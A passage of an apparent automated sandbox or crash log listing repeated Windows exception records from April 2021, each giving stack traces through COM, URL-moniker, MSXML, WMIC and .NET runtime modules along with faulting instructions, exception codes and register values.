DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 32961068 registers.edi: 3808164 registers.eax: 32961068 registers.ebp: 32961148 registers.edx: 53 registers.ebx: 32961432 registers.esi: 2147746133 registers.ecx: 3565784	1
__exception__ April 12, 2021, 10:40 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72a16f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72a16e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x72a127a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72a12652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x72a1253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72a12411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x72a125ab wmic+0x39c80 @ 0x789c80 wmic+0x3b06a @ 0x78b06a wmic+0x3b1f8 @ 0x78b1f8 wmic+0x36fcd @ 0x786fcd wmic+0x3d6e9 @ 0x78d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 1631800 registers.edi: 1957755408 registers.eax: 1631800 registers.ebp: 1631880 registers.edx: 1 registers.ebx: 3535444 registers.esi: 2147746133 registers.ecx: 3593655349	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0x6f0567 0x6f0308 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x648f2652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6490264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64902e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x649b74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x649b7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x64a41dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x64a41e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x64a41f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x64a4416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7387f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73827f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73824de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x6f06a9 registers.esp: 2747876 registers.edi: 40061868 registers.eax: 0 registers.ebp: 2747916 registers.edx: 195 registers.ebx: 2748204 registers.esi: 40066556 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab0308 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x643174ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x64317610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x643a1dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x643a1e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x643a1f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x643a416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x7387f5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x73827f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x73824de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 4255236 registers.edi: 34819012 registers.eax: 0 registers.ebp: 4255276 registers.edx: 195 registers.ebx: 4255572 registers.esi: 34823700 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 48 04 39 09 e8 fc 3c fb 61 85 c0 0f 8e 73 ff exception.instruction: mov ecx, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab41aa registers.esp: 95286412 registers.edi: 95286524 registers.eax: 0 registers.ebp: 95286448 registers.edx: 8672328 registers.ebx: 34818888 registers.esi: 34818868 registers.ecx: 1681919321	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab3aaf mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 93974212 registers.edi: 34819012 registers.eax: 0 registers.ebp: 93974252 registers.edx: 195 registers.ebx: 34930676 registers.esi: 34937996 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 57 4f fb 61 eb 11 8b c8 e8 be ed 50 6d exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab4862 registers.esp: 95286364 registers.edi: 95286388 registers.eax: 0 registers.ebp: 95286404 registers.edx: 8672328 registers.ebx: 34818888 registers.esi: 34818868 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 50 1c eb 11 8b c8 e8 9d ed 50 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab4882 registers.esp: 95286364 registers.edi: 95286388 registers.eax: 95286364 registers.ebp: 95286404 registers.edx: 11225212 registers.ebx: 34818888 registers.esi: 34818868 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 30 ff 50 10 eb 11 8b c8 e8 7c ed 50 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab48a3 registers.esp: 95286364 registers.edi: 95286388 registers.eax: 95286364 registers.ebp: 95286404 registers.edx: 11225245 registers.ebx: 34818888 registers.esi: 34818868 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab4fe8 0xab3c4c mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645808 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645848 registers.edx: 195 registers.ebx: 34938888 registers.esi: 34945508 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab4b5f 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 95286284 registers.edi: 34819012 registers.eax: 0 registers.ebp: 95286324 registers.edx: 195 registers.ebx: 35408268 registers.esi: 35416136 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab507d 0xab5009 0xab3c4c mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 97645804 registers.edi: 34819012 registers.eax: 0 registers.ebp: 97645844 registers.edx: 195 registers.ebx: 34939056 registers.esi: 35455908 registers.ecx: 0	1
__exception__ April 12, 2021, 10:41 a.m.	stacktrace: 0xab0567 0xab3bc9 0xab4fe8 0xab4c61 0xab44d0 mscorlib+0x30c9ff @ 0x6359c9ff mscorlib+0x302367 @ 0x63592367 mscorlib+0x3022a6 @ 0x635922a6 mscorlib+0x302261 @ 0x63592261 mscorlib+0x30ca7c @ 0x6359ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x64252652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x6426264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x64262e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x642f07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x642c7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x642c7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x642c7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x6425c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x642f0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x6436a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 8b 01 8b 40 28 ff 10 89 45 dc eb 1f 8b c8 e8 54 exception.instruction: mov eax, dword ptr [ecx] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xab06a9 registers.esp: 95286212 registers.edi: 34819012 registers.eax: 0 